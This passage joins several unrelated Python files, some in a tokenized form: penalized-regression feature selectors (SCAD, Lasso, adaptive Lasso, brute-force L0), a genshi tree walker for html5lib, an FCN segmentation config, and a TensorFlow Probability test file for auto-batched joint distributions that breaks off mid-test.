beta<block_start><return>self._sse_jac(x y beta)+self._penalty_jac(x y beta)<block_end><return>_jac<block_end><def_stmt>construct_constraints self x:np.ndarray y:np.ndarray beta:Optional[np.ndarray]=<none><arrow>List[Optional[Dict]]<block_start>""" No constraints Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): placeholder only Returns: a list of 
dictionary constraints """<line_sep><return>[]<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the penalty from input x, output y and coefficient beta Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets beta (np.ndarray): N coefficients Returns: penalty value """<line_sep><return>0.0<block_end><block_end><class_stmt>SCAD(PenalizedLeastSquares)<block_start>""" Smoothly clipped absolute deviation (SCAD), equation 12 and 13 in https://orfe.princeton.edu/~jqfan/papers/06/SIS.pdf """<def_stmt>__init__ self lambd:Union[float np.ndarray] a:float=3.7 **kwargs<block_start>""" Smoothly clipped absolute deviation. Args: lambd (float or list of floats): The weights for the penalty a (float): hyperparameter in SCAD penalty """<line_sep>self.lambd=lambd<line_sep>self.a=a<line_sep>super().__init__(**kwargs)<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the SCAD penalty from input x, output y and coefficient beta Args: beta (np.ndarray): N coefficients x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: penalty value """<line_sep>beta_abs=np.abs(beta)<line_sep>penalty=(self.lambd<times>beta_abs<times>(beta_abs<le>self.lambd)+-(beta_abs<power>2-2<times>self.a<times>self.lambd<times>beta_abs+self.lambd<power>2)/(2<times>(self.a-1))<times>(beta_abs<g>self.lambd)<times>(beta_abs<le>self.a<times>self.lambd)+(self.a+1)<times>self.lambd<power>2/2.0<times>(beta_abs<g>self.a<times>self.lambd))<line_sep><return>np.sum(penalty).item()<block_end><def_stmt>_penalty_jac self x y 
beta<block_start>beta=np.abs(beta)<line_sep>z=self.a<times>self.lambd-beta<line_sep>z[z<l>0]=0<line_sep><return>self.lambd<times>(beta<le>self.lambd+z/((self.a-1)<times>self.lambd)<times>(beta<g>self.lambd))<block_end><block_end><class_stmt>Lasso(PenalizedLeastSquares)<block_start>""" Simple Lasso regression """<def_stmt>__init__ self lambd **kwargs<block_start>""" Lasso regression with lambda * norm_1(beta) as penalty Args: lambd (float): weights for the penalty **kwargs: """<line_sep>self.lambd=lambd<line_sep>super().__init__(**kwargs)<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the penalty from input x, output y and coefficient beta Args: beta (np.ndarray): N coefficients x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: penalty value """<line_sep>beta_abs=np.abs(beta)<line_sep><return>np.sum(self.lambd<times>beta_abs).item()<block_end><def_stmt>_penalty_jac self x y beta<block_start>sign=np.sign(beta)<line_sep>sign[np.abs(sign)<l>0.2]=1<line_sep><return>self.lambd<times>sign<block_end><block_end><class_stmt>AdaptiveLasso(PenalizedLeastSquares)<block_start>""" Adaptive lasso regression using OLS coefficients as the root-n estimator coefficients """<def_stmt>__init__ self lambd gamma **kwargs<block_start>""" Adaptive lasso regression Args: lambd (float or list of floats): gamma (float): exponential for hat(beta) **kwargs: """<line_sep>self.lambd=lambd<line_sep>self.gamma=gamma<line_sep>self.w=1<line_sep>super().__init__(**kwargs)<block_end><def_stmt>select self x y options=<none><arrow>Optional[np.ndarray]<block_start>""" Select feature indices from x Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets options (dict): options in the optimizations provided to scipy.optimize.minimize Returns: list of int indices """<line_sep>self.w=self.get_w(x y)<line_sep><return>super().select(x y 
options)<block_end><def_stmt>get_w self x y<arrow>np.ndarray<block_start>""" Get adaptive weights from data Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: coefficients array """<line_sep>beta_hat=lstsq(x y)[0]<line_sep>w=1.0/np.abs(beta_hat)<power>self.gamma<line_sep><return>w<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the penalty from input x, output y and coefficient beta Args: beta (np.ndarray): N coefficients x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: penalty value """<line_sep><return>np.sum(self.lambd<times>self.w<times>np.abs(beta)).item()<block_end><def_stmt>_penalty_jac self x y beta<block_start>sign=np.sign(beta)<line_sep>sign[np.abs(sign)<l>0.2]=1<line_sep><return>self.lambd<times>self.w<times>sign<block_end><block_end><class_stmt>L0BrutalForce(BaseSelector)<block_start>""" Brutal force combinatorial screening of features. 
This method takes all possible combinations of features and optimize the following loss function 1/2 * mean((y-x @ beta)**2) + lambd * |beta|_0 """<def_stmt>__init__ self lambd:float **kwargs<block_start>""" Initialization of L0 optimization Args: lambd (float): penalty term **kwargs: """<line_sep>self.lambd=lambd<line_sep>super().__init__(**kwargs)<block_end><def_stmt>select self x:np.ndarray y:np.ndarray options:Optional[Dict]=<none> n_job:int=1<arrow>Optional[np.ndarray]<block_start>""" L0 combinatorial optimization Args: x (np.ndarray): design matrix y (np.ndarray): target vector options: n_job (int): number of cpu Returns: """<line_sep>n,p=x.shape<line_sep>index_array=list(range(p))<def_stmt>_lstsq c<block_start>x_comb=x[: c]<line_sep>beta=lstsq(x_comb y)[0]<line_sep>res=1.0/2<times>np.mean((x_comb.dot(beta)-y)<power>2)<line_sep>penalty=self.lambd<times>len(c)<line_sep>res<augadd>penalty<line_sep><return>res<block_end>indices=[]<for_stmt>p_temp range(1 p+1)<block_start><for_stmt>comb combinations(index_array p_temp)<block_start>indices.append(comb)<block_end><block_end>loss=Parallel(n_jobs=n_job)(delayed(_lstsq)(comb)<for>comb indices)<line_sep>argmin=np.argmin(loss)<line_sep>self.indices=np.array(indices[argmin])<line_sep>x_temp=x[: self.indices]<line_sep>self.coef_=np.zeros_like(x[0 :])<line_sep>self.coef_[self.indices]=lstsq(x_temp y)[0]# type: ignore <return>self.indices<block_end><block_end>
<import_from_future_stmt> absolute_import division unicode_literals<import_from_stmt>genshi.core QName<import_from_stmt>genshi.core START END XML_NAMESPACE DOCTYPE TEXT<import_from_stmt>genshi.core START_NS END_NS START_CDATA END_CDATA PI COMMENT<import_from_stmt>. base<import_from_stmt>..constants voidElements namespaces<class_stmt>TreeWalker(base.TreeWalker)<block_start><def_stmt>__iter__ self# Buffer the events so we can pass in the following one <block_start>previous=<none><for_stmt>event self.tree<block_start><if_stmt>previous<is><not><none><block_start><for_stmt>token self.tokens(previous event)<block_start><yield>token<block_end><block_end>previous=event<block_end># Don't forget the final event! <if_stmt>previous<is><not><none><block_start><for_stmt>token self.tokens(previous <none>)<block_start><yield>token<block_end><block_end><block_end><def_stmt>tokens self event next<block_start>kind,data,_=event<if_stmt>kind<eq>START<block_start>tag,attribs=data<line_sep>name=tag.localname<line_sep>namespace=tag.namespace<line_sep>converted_attribs={}<for_stmt>k,v attribs<block_start><if_stmt>isinstance(k QName)<block_start>converted_attribs[(k.namespace k.localname)]=v<block_end><else_stmt><block_start>converted_attribs[(<none> k)]=v<block_end><block_end><if_stmt>namespace<eq>namespaces["html"]<and>name<in>voidElements<block_start><for_stmt>token self.emptyTag(namespace name converted_attribs <not>next<or>next[0]<ne>END<or>next[1]<ne>tag)<block_start><yield>token<block_end><block_end><else_stmt><block_start><yield>self.startTag(namespace name converted_attribs)<block_end><block_end><elif_stmt>kind<eq>END<block_start>name=data.localname<line_sep>namespace=data.namespace<if_stmt>namespace<ne>namespaces["html"]<or>name<not><in>voidElements<block_start><yield>self.endTag(namespace name)<block_end><block_end><elif_stmt>kind<eq>COMMENT<block_start><yield>self.comment(data)<block_end><elif_stmt>kind<eq>TEXT<block_start><for_stmt>token 
self.text(data)<block_start><yield>token<block_end><block_end><elif_stmt>kind<eq>DOCTYPE<block_start><yield>self.doctype(*data)<block_end><elif_stmt>kind<in>(XML_NAMESPACE DOCTYPE START_NS END_NS START_CDATA END_CDATA PI)<block_start><pass><block_end><else_stmt><block_start><yield>self.unknown(kind)<block_end><block_end><block_end>
_base_=['../_base_/models/fcn_r50-d8.py' '../_base_/datasets/pascal_context.py' '../_base_/default_runtime.py' '../_base_/schedules/schedule_40k.py']<line_sep>model=dict(decode_head=dict(num_classes=60) auxiliary_head=dict(num_classes=60) test_cfg=dict(mode='slide' crop_size=(480 480) stride=(320 320)))<line_sep>optimizer=dict(type='SGD' lr=0.004 momentum=0.9 weight_decay=0.0001)<line_sep>
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the JointDistributionAutoBatched."""<import_stmt>collections<import_stmt>os<line_sep># Dependency imports
<import_from_stmt>absl.testing parameterized<import_stmt>numpy<as>np<import_stmt>tensorflow.compat.v1<as>tf1<import_stmt>tensorflow.compat.v2<as>tf<import_stmt>tensorflow_probability<as>tfp<import_from_stmt>tensorflow_probability.python.internal test_util<line_sep>tfb=tfp.bijectors<line_sep>tfd=tfp.distributions<line_sep>JAX_MODE=<false><line_sep>Root=tfd.JointDistributionCoroutineAutoBatched.Root<line_sep># Each test below is parameterized over the three AutoBatched JD variants
# (Coroutine / Sequential / Named), exercising the same model in each flavor.
@test_util.test_all_tf_execution_regimes<class_stmt>JointDistributionAutoBatchedTest(test_util.TestCase)<block_start>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_batch_and_event_shape_with_plate self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>g=<yield>tfd.LogNormal(0. 
1.)<line_sep>df=<yield>tfd.Exponential(1.)<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20)<line_sep><yield>tfd.StudentT(tf.expand_dims(df -1) loc 1)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.LogNormal(0. 1.) tfd.Exponential(1.) <lambda>_ g:tfd.Sample(tfd.Normal(0 g) 20) <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('g' tfd.LogNormal(0. 1.)) ('df' tfd.Exponential(1.)) ('loc' <lambda>g:tfd.Sample(tfd.Normal(0 g) 20)) ('x' <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep># Properties `event_shape` and `batch_shape` should be defined
# even before any sampling calls have occurred.
self.assertAllEqual(joint._model_flatten(joint.event_shape) [[] [] [20] [20]])<line_sep>self.assertAllEqual(joint.batch_shape [])<line_sep>is_scalar=joint._model_flatten(joint.is_scalar_event())<line_sep>self.assertAllEqual(is_scalar[0] <true>)<line_sep>self.assertAllEqual(is_scalar[1] <true>)<line_sep>self.assertAllEqual(is_scalar[2] <false>)<line_sep>self.assertAllEqual(is_scalar[3] <false>)<line_sep>event_shape=joint._model_flatten(joint.event_shape_tensor())<line_sep>self.assertAllEqual(event_shape[0] [])<line_sep>self.assertAllEqual(event_shape[1] [])<line_sep>self.assertAllEqual(event_shape[2] [20])<line_sep>self.assertAllEqual(event_shape[3] [20])<line_sep>self.assertEqual(joint.is_scalar_batch() <true>)<line_sep>batch_shape=joint.batch_shape_tensor()<line_sep>self.assertAllEqual(batch_shape [])<block_end># Same four-variable model, but with batch_ndims=1: each component carries a
# leading [2] batch dimension and log_prob of [5] samples has shape [5, 2].
@parameterized.named_parameters(*(dict(# pylint: disable=g-complex-comprehension
testcase_name=jd_type+'_'+sampler_type jd_class=getattr(tfd 'JointDistribution'+jd_type+'AutoBatched') sampler_type=sampler_type)<for>jd_type ('Coroutine' 'Sequential' 'Named')<for>sampler_type ('stateful' 
'stateless')))<def_stmt>test_model_with_nontrivial_batch_shape self jd_class sampler_type<block_start>models={}<def_stmt>coroutine_model <block_start>g=<yield>tfd.LogNormal(0. [1. 2.])<line_sep>df=<yield>tfd.Exponential([1. 2.])<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20)<line_sep><yield>tfd.StudentT(tf.expand_dims(df -1) loc 1)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.LogNormal(0. [1. 2.]) tfd.Exponential([1. 2.]) <lambda>_ g:tfd.Sample(tfd.Normal(0 g) 20) <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('g' tfd.LogNormal(0. [1. 2.])) ('df' tfd.Exponential([1. 2.])) ('loc' <lambda>g:tfd.Sample(tfd.Normal(0 g) 20)) ('x' <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1))))<line_sep>joint=jd_class(models[jd_class] batch_ndims=1 validate_args=<true>)<line_sep>self.assertAllEqual(joint._model_flatten(joint.event_shape) [[] [] [20] [20]])<line_sep>self.assertAllEqual(joint.batch_shape [2])<line_sep>is_scalar=joint._model_flatten(joint.is_scalar_event())<line_sep>self.assertAllEqual(is_scalar[0] <true>)<line_sep>self.assertAllEqual(is_scalar[1] <true>)<line_sep>self.assertAllEqual(is_scalar[2] <false>)<line_sep>self.assertAllEqual(is_scalar[3] <false>)<line_sep>self.assertAllEqual(joint.is_scalar_batch() <false>)<line_sep>batch_shape=self.evaluate(joint.batch_shape_tensor())<line_sep>self.assertAllEqual(batch_shape [2])<line_sep>x=joint.sample([5] seed=test_util.test_seed(sampler_type=sampler_type))<line_sep>lp=self.evaluate(joint.log_prob(x))<line_sep>self.assertAllEqual(lp.shape [5 2])<block_end># batch_ndims fed through a tf1 placeholder: static shapes become unknown
# (TensorShape(None)) while the dynamic shape tensors still resolve to [2].
<def_stmt>test_model_with_dynamic_batch_ndims self<block_start><if_stmt>tf.executing_eagerly()<block_start>self.skipTest('Dynamic shape.')<block_end><def_stmt>coroutine_model <block_start>g=<yield>tfd.LogNormal(0. [1. 2.])<line_sep>df=<yield>tfd.Exponential([1. 
2.])<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20)<line_sep><yield>tfd.StudentT(tf.expand_dims(df -1) loc 1)<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(coroutine_model batch_ndims=tf1.placeholder_with_default(1 shape=[]) validate_args=<true>)<line_sep>batch_shape_tensor=self.evaluate(joint.batch_shape_tensor())<line_sep>self.assertAllEqual(batch_shape_tensor [2])<line_sep>event_shape_tensor=self.evaluate(joint.event_shape_tensor())<line_sep>self.assertAllEqual(event_shape_tensor[0] [])<line_sep>self.assertAllEqual(event_shape_tensor[1] [])<line_sep>self.assertAllEqual(event_shape_tensor[2] [20])<line_sep>self.assertAllEqual(event_shape_tensor[3] [20])<line_sep>self.assertAllEqual(joint.batch_shape tf.TensorShape(<none>))<line_sep>self.assertAllEqual(joint._model_flatten(joint.event_shape) [tf.TensorShape(<none>)]<times>4)<line_sep>x=joint.sample([5] seed=test_util.test_seed(sampler_type='stateless'))<line_sep>lp=self.evaluate(joint.log_prob(x))<line_sep>self.assertAllEqual(lp.shape [5 2])<block_end># Ragged batch shapes: validate_args rejects inconsistent component batch
# shapes in the AutoBatched classes, but without validation the broadcasting
# behavior matches the corresponding base (non-AutoBatched) JD class.
@parameterized.named_parameters({'testcase_name':'coroutine' 'base_jd_class':tfd.JointDistributionCoroutine 'jda_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'base_jd_class':tfd.JointDistributionSequential 'jda_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'base_jd_class':tfd.JointDistributionNamed 'jda_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_broadcast_ragged_batch_shape self base_jd_class jda_class<block_start>base_jd_models={}<line_sep># Writing a JDC with ragged batch shape will broadcast the first
# distribution over the second.
# (though note, this model breaks `log_prob` with nontrivial sample shape).
<def_stmt>coroutine <block_start>x=<yield>Root(tfd.Normal(0. scale=1.))<line_sep><yield>tfd.Normal(x[<ellipsis> tf.newaxis] [1. 2. 3. 4. 
5.])<block_end>base_jd_models[tfd.JointDistributionCoroutine]=coroutine<line_sep>base_jd_models[tfd.JointDistributionSequential]=[tfd.Normal(0. scale=1.) <lambda>x:tfd.Normal(x[<ellipsis> tf.newaxis] [1. 2. 3. 4. 5.])]<line_sep>base_jd_models[tfd.JointDistributionNamed]={'x':tfd.Normal(0. scale=1.) 'y':<lambda>x:tfd.Normal(x[<ellipsis> tf.newaxis] [1. 2. 3. 4. 5.])}<line_sep># But we can get equivalent behavior in a JDCA by expanding dims so that
# the batch dimensions line up.
jd_auto_models={}<def_stmt>coroutine_auto <block_start>x=<yield>tfd.Normal(0. scale=[1.])<line_sep><yield>tfd.Normal(x [1. 2. 3. 4. 5.])<block_end>jd_auto_models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_auto<line_sep>jd_auto_models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Normal(0. scale=[1.]) <lambda>x:tfd.Normal(x [1. 2. 3. 4. 5.])]<line_sep>jd_auto_models[tfd.JointDistributionNamedAutoBatched]=(collections.OrderedDict((('x' tfd.Normal(0. scale=[1.])) ('y' <lambda>x:tfd.Normal(x [1. 2. 3. 4. 5.])))))<line_sep># Writing a JD with ragged batch shape will broadcast the first
# distribution over the second.
# (though note, this model breaks `log_prob` with nontrivial sample shape).
jd_broadcasting=base_jd_class(base_jd_models[base_jd_class])<line_sep># This model's broadcasting behavior is a footgun (it can break inference
# routines and cause silently incorrect optimization); it should be
# disallowed by `validate_args`.
<with_stmt>self.assertRaisesRegexp(Exception ('Component batch shapes are inconsistent|'<concat>'Broadcasting probably indicates an error in model specification'))<block_start>jda_invalid=jda_class(jd_auto_models[jda_class] batch_ndims=1 validate_args=<true>)<line_sep>_=self.evaluate(jda_invalid.log_prob(jda_invalid.sample(seed=test_util.test_seed())))<block_end># But, if the user wants to run with no guardrails, one can eke out
# performance wins when evaluating a shared value over multiple models.
jda_broadcasting=jda_class(jd_auto_models[jda_class] batch_ndims=1)<line_sep>self.assertAllEqual(jda_broadcasting._model_flatten(jda_broadcasting.event_shape) [[] []])<line_sep>self.assertAllEqual(jda_broadcasting.batch_shape [5])<line_sep>joint_sample=jda_broadcasting.sample(seed=test_util.test_seed())<line_sep>x_sample,y_sample=self.evaluate(list(joint_sample.values())<if>hasattr(joint_sample 'values')<else>joint_sample)<line_sep># The model samples only a single value for x, shared across the batch.
self.assertAllEqual(x_sample.shape [1])<line_sep>self.assertAllEqual(y_sample.shape [5])<line_sep>lp_jd_broadcast=self.evaluate(jd_broadcasting.log_prob(jd_broadcasting._model_unflatten([x_sample[<ellipsis> 0] y_sample])))<line_sep>lp_jda_broadcast=self.evaluate(jda_broadcasting.log_prob(jda_broadcasting._model_unflatten([x_sample y_sample])))<line_sep>self.assertAllEqual(lp_jda_broadcast.shape [5])<line_sep>self.assertAllEqual(lp_jd_broadcast lp_jda_broadcast)<line_sep># Try drawing multiple samples and computing log-prob.
joint_sample=self.evaluate(jda_broadcasting.sample([2 3] seed=test_util.test_seed()))<line_sep>lp_jda_broadcast=self.evaluate(jda_broadcasting.log_prob(joint_sample))<line_sep>self.assertAllEqual(lp_jda_broadcast.shape [2 3 5])<block_end># log_prob/prob of a plated (Sample-wrapped) model agree with a hand-derived
# closed form: Bernoulli root, plated Bernoulli, then a Normal observation.
@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_log_prob_and_prob_with_plate self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>a=<yield>tfd.Bernoulli(probs=0.5 dtype=tf.float32)<line_sep>b=<yield>tfd.Sample(tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32) 2)<line_sep><yield>tfd.Normal(loc=a scale=1.+b)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Bernoulli(probs=0.5 dtype=tf.float32) <lambda>a:tfd.Sample(tfd.Bernoulli(# pylint: disable=g-long-lambda
probs=0.25+0.5<times>a dtype=tf.float32) 2) <lambda>b a:tfd.Normal(loc=a scale=1.+b)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('a' tfd.Bernoulli(probs=0.5 dtype=tf.float32)) ('b' <lambda>a:tfd.Sample(tfd.Bernoulli(# pylint: disable=g-long-lambda
probs=0.25+0.5<times>a dtype=tf.float32) 2)) ('c' <lambda>b a:tfd.Normal(loc=a scale=1.+b))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep>z=self.evaluate(joint.sample(seed=test_util.test_seed()))<line_sep>a,b,c=z.values()<if>hasattr(z 'values')<else>z<line_sep>log_prob=self.evaluate(joint.log_prob(z))<line_sep>prob=self.evaluate(joint.prob(z))<line_sep>expected_log_prob=self.evaluate(np.log(0.5)+tf.reduce_sum(tf.math.log(b<times>(0.25+0.5<times>a)+(1-b)<times>(0.75-0.5<times>a)))+tf.reduce_sum(-0.5<times>((c-a)/(1.+b))<power>2-0.5<times>np.log(2.<times>np.pi)-tf.math.log((1.+b))))<line_sep>self.assertAllClose(log_prob 
expected_log_prob)<line_sep>self.assertAllClose(prob np.exp(expected_log_prob))<block_end># log_prob over a sample of size 4 (no plate) matches the elementwise
# closed-form expression.
@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_log_prob_multiple_samples self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>a=<yield>tfd.Bernoulli(probs=0.5 dtype=tf.float32)<line_sep>b=<yield>tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32)<line_sep><yield>tfd.Normal(loc=a scale=1.+b)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Bernoulli(probs=0.5 dtype=tf.float32) <lambda>a:tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32) <lambda>b a:tfd.Normal(loc=a scale=1.+b)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('a' tfd.Bernoulli(probs=0.5 dtype=tf.float32)) ('b' <lambda>a:tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32)) ('c' <lambda>b a:tfd.Normal(loc=a scale=1.+b))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep>z=joint.sample(4 seed=test_util.test_seed())<line_sep>log_prob=joint.log_prob(z)<line_sep>a,b,c=z.values()<if>hasattr(z 'values')<else>z# pylint: disable=unbalanced-tuple-unpacking
expected_log_prob=(np.log(0.5)+tf.math.log(b<times>(0.25+0.5<times>a)+(1-b)<times>(0.75-0.5<times>a))+-0.5<times>((c-a)/(1.+b))<power>2-0.5<times>np.log(2.<times>np.pi)-tf.math.log((1.+b)))<line_sep>self.assertAllClose(*self.evaluate([log_prob expected_log_prob]))<block_end># experimental_sample_and_log_prob returns the same sample as `sample` (with
# kwargs pinned) and a log_prob computed without invoking bijector inverses.
@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 
'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_sample_and_log_prob self jd_class# Define a bijector to detect if/when `inverse` is called.
<block_start>inverted_values=[]<class_stmt>InverseTracingExp(tfb.Exp)<block_start><def_stmt>_inverse self y<block_start>inverted_values.append(y)<line_sep><return>tf.math.log(y)<block_end><block_end>models={}<def_stmt>coroutine_model <block_start>g=<yield>InverseTracingExp()(tfd.Normal(0. 1.) name='g')<line_sep>df=<yield>tfd.Exponential(1. name='df')<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20 name='loc')<line_sep><yield>tfd.StudentT(df loc 1 name='x')<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[InverseTracingExp()(tfd.Normal(0. 1.) name='g') tfd.Exponential(1. name='df') <lambda>_ g:tfd.Sample(tfd.Normal(0 g) 20 name='loc') <lambda>loc df:tfd.StudentT(df loc 1 name='x')]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('g' InverseTracingExp()(tfd.Normal(0. 1.))) ('df' tfd.Exponential(1.)) ('loc' <lambda>g:tfd.Sample(tfd.Normal(0 g) 20)) ('x' <lambda>loc df:tfd.StudentT(df loc 1))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep>seed=test_util.test_seed(sampler_type='stateless')<for_stmt>sample_shape ([] [5])<block_start>inverted_values.clear()<line_sep>x1,lp1=self.evaluate(joint.experimental_sample_and_log_prob(sample_shape seed=seed df=2.7))<line_sep># Check that kwargs are supported.
x2=self.evaluate(joint.sample(sample_shape seed=seed df=2.7))<line_sep>self.assertAllCloseNested(x1 x2)<line_sep>self.assertLen(inverted_values 0)<line_sep>lp2=joint.log_prob(x1)<line_sep>self.assertLen(inverted_values 1)<line_sep>self.assertAllClose(lp1 lp2)<block_end><block_end># sample_distributions with sample shape [4, 3]: each returned component
# distribution carries at least those two batch dimensions.
@test_util.jax_disable_test_missing_functionality('b/157594634')<def_stmt>test_sample_distributions self<block_start><def_stmt>coroutine_model <block_start>g=<yield>tfd.Normal(0. 1. 
name='g')<line_sep>df=<yield>tfd.Exponential(1. name='df')<line_sep>loc=<yield>tfd.Normal(tf.zeros([20]) g name='loc')<line_sep><yield>tfd.StudentT(df loc 1 name='x')<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(coroutine_model)<line_sep>ds,xs=joint.sample_distributions([4 3] seed=test_util.test_seed())<for_stmt>d,x zip(ds xs)<block_start>self.assertGreaterEqual(len(d.batch_shape) 2)<line_sep>lp=d.log_prob(x)<line_sep>self.assertAllEqual(lp.shape[:2] [4 3])<block_end><block_end># Components that are not CompositeTensor cannot be returned from the vmapped
# sample_distributions path; a nontrivial sample shape must raise TypeError.
@test_util.jax_disable_test_missing_functionality('b/201586404')<def_stmt>test_sample_distributions_not_composite_tensor_raises_error self<block_start><def_stmt>coroutine_model <block_start><yield>tfd.TransformedDistribution(tfd.Normal(0. 1.) tfb.Exp() name='td')<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(coroutine_model)<line_sep># Sampling with trivial sample shape avoids the vmap codepath.
ds,_=joint.sample_distributions([] seed=test_util.test_seed())<line_sep>self.assertIsInstance(ds[0] tfd.TransformedDistribution)<with_stmt>self.assertRaisesRegex(TypeError r'Some component distribution\(s\) cannot be returned')<block_start>joint.sample_distributions([4 3] seed=test_util.test_seed())<block_end><block_end># Passing a previously drawn batched sample back in via `value=` reproduces
# it exactly (requires autovectorization of the mixed-shape model).
<def_stmt>test_sample_with_batch_value self<block_start>@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>a=<yield>tfd.Sample(tfd.Normal(0 1.) 2)<line_sep>b=<yield>tfd.Sample(tfd.Normal(0 1.) 3)<line_sep># The following line fails if not autovectorized.
<yield>tfd.Normal(a[tf.newaxis <ellipsis>]<times>b[<ellipsis> tf.newaxis] 1.)<block_end>x=self.evaluate(dist.sample(123 seed=test_util.test_seed()))<line_sep>x2=self.evaluate(dist.sample(value=x seed=test_util.test_seed()))<line_sep>self.assertAllCloseNested(x x2)<line_sep># Also test a dict-type value (JDNamed).
dist=tfd.JointDistributionNamedAutoBatched({'a':tfd.Sample(tfd.Normal(0 1.) 2) 'b':tfd.Sample(tfd.Normal(0 1.) 
3) 'c':<lambda>a b:tfd.Normal(# pylint: disable=g-long-lambda
a[tf.newaxis <ellipsis>]<times>b[<ellipsis> tf.newaxis] 1.)})<line_sep>x=self.evaluate(dist.sample(123 seed=test_util.test_seed()))<line_sep>x2=self.evaluate(dist.sample(value=x seed=test_util.test_seed()))<line_sep>self.assertAllCloseNested(x x2)<block_end># Individual components may be pinned by name as keyword args to `sample`;
# the remaining components are drawn with the implied batch shape.
<def_stmt>test_sample_with_value_as_kwarg self<block_start>@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>a=<yield>tfd.Sample(tfd.Normal(0 1.) 2 name='a')<line_sep>b=<yield>tfd.Sample(tfd.Normal(0 1.) 3 name='b')<line_sep># The following line fails if not autovectorized.
